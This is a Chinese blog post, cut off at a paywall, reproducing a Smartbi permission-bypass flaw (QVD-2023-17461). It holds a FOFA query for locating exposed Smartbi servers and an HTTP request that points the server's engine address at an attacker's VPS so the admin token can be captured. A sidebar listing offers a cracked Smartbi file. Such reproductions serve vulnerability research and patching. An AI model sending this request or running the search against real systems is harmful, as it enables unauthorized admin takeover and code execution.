Smartbi 权限绕过漏洞复现(QVD-2023-17461)

已于 2023-08-09 15:33:48 修改
阅读量2.5k 收藏 2
点赞数 4
分类专栏: 漏洞复现 文章标签: 安全 web安全 网络安全
于 2023-08-09 13:09:06 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/132185106
版权

0x01 产品简介

   Smartbi大数据分析产品融合BI定义的所有阶段,对接各种业务数据库、数据仓库和大数据分析平台,进行加工处理、分析挖掘和可视化展现;满足所有用户的各种数据分析应用需求,如大数据分析、可视化分析、探索式分析、复杂报表、应用分享等等。

0x02 漏洞概述

    Smartbi在特定情况下可被获取用户token,未经授权的攻击者可通过这种方式获取管理员权限,从而以管理员权限接管后台,进一步利用可实现任意代码执行。利用此漏洞需目标可出网。  

0x03 影响范围

  V6 <= Smartbi <= V10

0x04 复现环境

FOFA:app="SMARTBI"

c9043c3d0bdc4b84888755d49baca9e3.png

0x05 漏洞复现

 更新内部引擎地址

POST /smartbi/smartbix/api/monitor/setEngineAddress HTTP/1.1
Host: your-ip
Content-Type: application/json

http://vpsip:8000

了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
  • 4
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
Smartbi内置用户登陆绕过漏洞
0xSec
06-19 4226
Smartbi在安装时会内置几个用户,在使用特定接口时,可绕过用户身份认证机制获取其身份凭证,随后可使用获取的身份凭证调用后台接口,可能导致敏感信息泄露和代码执行。
漏洞--Smartbi smartbivisionRMIServlet 接口权限绕过漏洞
qq_53003652的博客
12-18 695
Smartbi大数据分析产品融合BI定义的所有阶段,对接各种业务数据库、数据仓库和大数据分析平台,进行加工处理、分析挖掘和可视化展,满足所有用户的各种数据分析应用需求,如大数据分析、可视化分析、探索式分析、杂报表、应用分享等等。该产品存在接口绕过漏洞,攻击者可通过此漏洞绕过登录流程。获取到的cookie为管理用户,可直接利用进入后台。
Smartbi的安装部署
热门推荐
zq24zq的博客
12-14 1万+
一、系统环境要求 对客户端系统推荐要求 二、在服务器上手动安装部署smartbi.war 使用服务器应用包 smartbi.war 手工安装配置 Smartbi 的完整流程如下: 2.1申请License Smartbi-License.xml 如下图:   2.2、手工创建知识库 在MySQL中创建数据库smartbirepository,并
smartbi破解文件
04-09
smartbi V7.02破解文件,以及可执行程序可单独联系。 smartbi V7.02破解文件,以及可执行程序可单独联系。
2023 HW 必修高危漏洞集合
holyxp的博客
07-21 2977
高危风险漏洞一直是企业网络安全防护的薄弱点,也成为 HW 攻防演练期间红队的重要突破口;每年 HW 期间爆发了大量的高危风险漏洞成为红队突破网络边界防护的一把利器,很多企业因为这些高危漏洞而导致整个防御体系被突破、甚至靶标失守而遗憾出局。HW 攻防演练在即,输出HW 必修高危漏洞手册,意在帮助企业在 HW 攻防演练的前期进行自我风险排查,降低因高危漏洞而“城池失守”的风险。
Smartbi内置用户登陆绕过漏洞
holyxp的博客
07-25 565
Smartbi大数据分析产品融合BI定义的所有阶段,对接各种业务数据库、数据仓库和大数据分析平台,进行加工处理、分析挖掘和可视化展;满足所有用户的各种数据分析应用需求,如大数据分析、可视化分析、探索式分析、杂报表、应用分享等等。​ Smartbi在安装时会内置几个用户,在使用特定接口时,可绕过用户身份认证机制获取其身份凭证,随后可使用获取的身份凭证调用后台接口,可能导致敏感信息泄露和代码执行。
Smartbi权限绕过漏洞
m0_49025459的博客
08-24 408
该文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者无关。
SmartBI 权限绕过漏洞
weixin_68647219的博客
08-15 3452
Smartbi在特定情况下可被获取用户token,未经授权的攻击者可通过这种方式获取管理员权限,从而以管理员权限接管后台,进一步利用可实任意代码执行。利用此漏洞需目标可出网。
【严重】Smartbi商业智能BI软件权限绕过漏洞
murphysec的博客
08-02 433
Smartbi是一款商业智能应用,提供了数据集成、分析、可视化等功能,帮助用户理解和使用他们的数据进行决策。在Smartbi受影响版本中存在权限绕过问题,未授权的攻击者可以通过 RMI 的方式调用 getPassword 接口获取管理员token信息。获取管理员权限后,可进入后台实任意命令执行,进而对目标系统造成破坏或篡改窃取敏感信息。
smartbi for Excel 插件
04-19
非常好用 , 完全免费的smartbi插件. 制作smartbi必用
WPS Office 代码执行漏洞(QVD-2023-17241)
08-13
WPS Office 代码执行漏洞(QVD-2023-17241)
禅道项目管理系统身份认证绕过漏洞(QVD-2024-15263)POC
最新发布
05-10
禅道身份认证POC测试payload
Python库 | qvd-0.0.8-cp37-none-win_amd64.whl
04-03
资源分类:Python库 所属语言:Python 资源全名:qvd-0.0.8-cp37-none-win_amd64.whl 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
Python库 | qvd-0.0.7-cp37-none-win_amd64.whl
04-03
资源分类:Python库 所属语言:Python 资源全名:qvd-0.0.7-cp37-none-win_amd64.whl 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
smartbi token回调获取登录凭证漏洞
2301_79614903的博客
09-22 162
前段时间,Smartbi官方修了一处权限绕过漏洞。未经授权的攻击者可利用该漏洞,获取管理员token,完全接管管理员权限。于是研究了下相关补丁并进行分析。
Smartbi的下载安装教程
YanErrr的博客
12-23 1万+
Smartbi的下载安装 1、下载 官网下载地址:https://www.smartbi.com.cn/download 进入网页后点击立即下载按钮 下载安装包和Excel插件 2、申请试用 点击立即申请 手机号登录 选择试用版本,我选择的是个人试用 填写信息进行申请 提交成功后,下载License授权文件 至此我们需要的三个文件就下载成功了 安装 开始安装前,需要先关闭杀毒软件,不然可能导致安装失败,点击下一步 选择接受,然后下一步 我选的是个人试用版,公司名称可以随便填,然后下一步
SMARTBI权限管理
zhangliushi的博客
11-29 1052
分享SMARTBI权限管理的操作,供各位小伙伴参考。SMERTBI的权限可以细分到将某个表中某个字段的某个值授权给某个用户,比如将订单表中属于张三的订单授权给张三,那么张三查看数据时就只能看到自己的订单,看不到李四的订单。
在哪里能下载Smartbi个人免费版的授权文件呢?
思迈特Smartbi
09-01 1886
Smartbi Insight以中国式报表、多维度分析、可视化仪表盘为核心,满足报表需求的功能以“真Excel”为特色,将Office Excel和WPS表格变为企业级WEB报表设计器,表格样式与计算逻辑的灵活性不言而喻。 针对有报表需求并想试用Smartbi企业报表平台功能的个人用户,Smartbi官网提供个人免费版授权文件,以供用户下载试用。 操作步骤: 步骤一:在Smartbi官网的会员中心,注册个人账号并登陆; 步骤二:鼠标移到“服务支持”导航栏目,点击左侧产品获取中的“个人试用申请”,进入申请页
qvd-2023-45061漏洞
12-25
qvd-2023-45061漏洞是指某个系统或软件中存在的安全漏洞。为了验证这个漏洞,需要进行漏洞,即重漏洞的过程。首先,需要在具有相同环境和配置的测试系统上进行操作。其次,需要根据漏洞的描述和已知信息,尝试触发漏洞并记录操作步骤和结果。在进行漏洞的过程中,需要注意保护好测试环境,避免对系统造成实际危害。 在qvd-2023-45061漏洞的过程中,可以尝试利用已知的payload或者编写自定义的代码来触发漏洞,记录漏洞触发的条件和效果。在过程中,也可以尝试不同的输入和操作,寻找漏洞的边界和影响范围。同时,需要及时记录的过程和结果,以便进一步的分析和修。 当漏洞成功后,应该及时向相关安全团队或厂商报告漏洞,并提供详细的过程和结果。漏洞的结果将有助于安全团队更好地理解漏洞的本质和影响,有助于及时修和防范类似的漏洞。此外,漏洞也是安全研究和攻防技术提升的重要手段,通过漏洞可以加深对漏洞原理和利用方法的理解,提高安全防护和应对能力。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值